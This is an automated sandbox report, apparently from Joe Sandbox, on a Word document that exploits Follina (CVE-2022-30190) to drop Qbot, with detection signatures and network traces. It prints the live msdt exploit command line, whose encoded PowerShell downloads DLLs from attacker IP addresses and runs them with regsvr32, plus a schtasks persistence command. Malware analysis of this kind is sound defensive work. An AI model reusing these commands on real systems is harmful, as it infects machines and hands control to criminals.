Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name: doc782.docx
Analysis ID: 640879
MD5: e7015438268464cedad98b1544d643ad
SHA1: 03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256: d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Tags: CVE-2022-30190, doc, Follina, Obama186, Qbot, TA570

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2344 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 4584 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 3108 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6524 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6676 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 2108 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 408 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 5968 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 6384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 2312 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5836 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5892 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 4400 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4420 cmdline: -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard | 0x1447:$re1: location.href = "ms-msdt:

Source | Rule | Description | Author | Strings
0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Crypt | Yara detected CryptOne packer | Joe Security |
0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Source | Rule | Description | Author | Strings
41.2.regsvr32.exe.3420000.2.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
28.2.regsvr32.exe.5b60184.2.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
41.2.regsvr32.exe.33f0184.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
33.0.explorer.exe.7a0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
28.2.regsvr32.exe.2c30000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5316, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, ProcessId: 408, ProcessName: schtasks.exe

Timestamp: 06/07/22-18:38:14.250872
SID: 2036726
Source IP: 185.234.247.119
Source Port: 80
Destination IP: 192.168.2.22
Destination Port: 49173
Protocol: TCP
Classtype: Attempted User Privilege Gain

AV Detection

Source: doc782.docx Virustotal: Detection: 23%
Source: doc782.docx ReversingLabs: Detection: 17%
Source: 36.0.explorer.exe.c30000.0.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694"}

Exploits

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 26_2_049EBCFC FindFirstFileW,FindNextFileW,26_2_049EBCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0536BCFC FindFirstFileW,FindNextFileW,27_2_0536BCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_05B9BCFC FindFirstFileW,FindNextFileW,28_2_05B9BCFC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 33_2_007ABCFC FindFirstFileW,FindNextFileW,33_2_007ABCFC

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic TCP traffic: 192.168.2.4:49752 -> 185.234.247.119:80
Source: global traffic TCP traffic: 192.168.2.4:49758 -> 185.234.247.119:80

Networking

Source: Traffic Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49173
Source: Joe Sandbox View ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 07 Jun 2022 16:45:11 GMT
  Content-Type: application/octet-stream
  Content-Length: 1437696
  Connection: keep-alive
  Accept-Ranges: bytes
  Expires: 0
  Cache-Control: no-cache, no-store, must-revalidate
  Content-Disposition: attachment;
Source: global traffic HTTP traffic detected:
  GET /123.RES HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: 185.234.247.119
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /123.RES HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: 185.234.247.119
  If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
  If-None-Match: "6299dd5d-1861"
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /1676044147.dat HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: 185.234.247.119
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: ~WRS{51D44AD9-2EC9-4592-AFD3-FEABD139B753}.tmp.0.dr String found in binary or memory: http://185.234.247.119:80/123.RES
Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types
Source: regsvr32.exe, 00000029.00000002.548914112.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesI
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesU
                            Source: explorer.exe, 00000021.00000003.497219122.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000029.00000002.545672363.0000000002E41000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001A.00000002.494499846.0000000002C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeso
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.aadrm.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.office.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.onedrive.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.entity.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cortana.ai/api
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://cr.office.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://directory.services.
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: 65C14846-0162-44EF-84AC-78ACBBBAB237.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
